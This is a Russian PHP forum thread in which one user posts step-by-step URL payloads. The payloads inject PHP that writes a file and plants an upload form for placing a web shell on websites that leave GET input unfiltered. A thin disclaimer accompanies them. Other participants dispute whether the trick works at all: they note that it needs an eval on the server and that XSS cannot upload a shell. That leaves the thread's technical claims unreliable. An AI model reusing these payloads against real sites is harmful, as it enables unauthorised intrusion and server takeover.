Форум PHP программистов > Как залить шелл?

[ Поиск ] - [ Пользователи ] - [ Календарь ]

Страницы: 1, 2

Миша

20.05.2015 - 00:30

Если вы нашли сайт, на котором не фильтруются входящие даные GET, то можно попробовать залить шелл.

Продолжение..

_____________
Принимаю заказы, писать в ЛС

Миша

20.05.2015 - 00:32

1) В адресную строку, после index.php укажите (name - заменить)



http://xxx.ru/index.php?name=<?php $test=$_GET[name]; $test1 = $_GET[name2]; $test2 = substr($test,1); $test3 = $_GET[name3]; $test4 = 9; $test5 = str_replace($test4, $test2, $test3); file_put_contents($test1,$test5); ?>

Продолжение..

_____________
Принимаю заказы, писать в ЛС

Миша

20.05.2015 - 00:41

2) Открываем страницу, куда сохранились наши данные. В адресную строку, после index.php укажите


http://xxx.ru/index.php?name="&name2=schell.php&name3=<?php $test1=$_FILES[9abc9][9tmp_name9]; $test2=9schell.php9; move_uploaded_file($test1,$test2);  ?> <form enctype=9multipart/form-data9 action=9http://URL/schell.php9 method=9POST9><input type=9file9 name=9abc9><input type=9submit9 value=9загрузить файл9></form>

Теперь у нас есть форма, куда можно залить что угодно, в том числе и шелл.

_____________
Принимаю заказы, писать в ЛС

Миша

20.05.2015 - 00:51

Вся информация предоставленна исключительно в ознакомительных целях, и автор не несёт ответственности за использование этого кода. Если вы нашли подобный косяк на чужом сайте, напишите его администратору, так и так, здесь вот.

_____________
Принимаю заказы, писать в ЛС

Valick

20.05.2015 - 00:53

Цитата (Медведь @ 19.05.2015 - 23:51)

автор не несёт ответственности за использование этого кода

ещё как несет

_____________
Стимулятор ~yoomoney - 41001303250491

Миша

20.05.2015 - 00:55

Цитата (Valick @ 20.05.2015 - 00:53)

Цитата (Медведь @ 19.05.2015 - 23:51)

автор не несёт ответственности за использование этого кода

ещё как несет

Администраторы скройте пжл эту тему, если есть такая возможность, а ещё лучше показывать у кого есть приличный рейтинг.

_____________
Принимаю заказы, писать в ЛС

AllesKlar

20.05.2015 - 01:05

Что значит не фильтруются?
echo $_GET['name']; - это уже считается, что не фильтруются?
Куда сохраняются? В базу? На кой ляд в базе php код? Ну, форму html зальешь, а обработчик формы хде?

Покажи пример "дырявого" скрипта.

_____________
[продано копирайтерам]

volter9

20.05.2015 - 01:07

Медведь
А теперь выложи видео, что бы прям все наглядно было.

Попробовал по твоей инструкции, ничего не вышло:
user posted image

Что бы выполнился PHP нужно что бы там не echo, а eval был!
Т.е. не:

echo $_GET['name'];

А:

eval($_GET['name'])

P.S.: А ты сам то пробовал? :)

_____________
Мой блог

Миша

20.05.2015 - 01:08

Цитата (AllesKlar @ 20.05.2015 - 01:05)

Смотрите внимательно там и форма и обработчик.

_____________
Принимаю заказы, писать в ЛС

Миша

20.05.2015 - 01:10

Цитата (volter9 @ 20.05.2015 - 01:07)

P.S.: А ты сам то пробовал?

Пробовал, всё работает.

_____________
Принимаю заказы, писать в ЛС

AllesKlar

20.05.2015 - 01:16

Цитата (Медведь @ 19.05.2015 - 23:10)

Цитата (volter9 @ 20.05.2015 - 01:07)

P.S.: А ты сам то пробовал?

Пробовал, всё работает.

ну так выложи дырявый скрипт, все попробуем.

_____________
[продано копирайтерам]

brevis

20.05.2015 - 01:19

Очевидно, что дырявый скрипт должен быть таким:

file_put_contents('shell.php', $_GET['name'];

_____________
Чатик в телеге

brevis

20.05.2015 - 01:48

Короче можно расходиться, Медведь всех обманул.

_____________
Чатик в телеге

inpost

20.05.2015 - 02:09

А что вы ждали? Сказку?

Через XSS нельзя заливать shell.

_____________
Обучаю веб-программированию качественно и не дорого: http://school-php.com
Фрилансер, принимаю заказы: PHP, JS, AS (видео-чаты). Писать в ЛС (Личные сообщения на phpforum).

Миша

20.05.2015 - 02:17

Цитата (inpost @ 20.05.2015 - 02:09)

А что вы ждали? Сказку?

Через XSS нельзя заливать shell.

Смотрите внимательнее. Шелл залил.

_____________
Принимаю заказы, писать в ЛС

Быстрый ответ:

Здесь расположена полная версия этой страницы.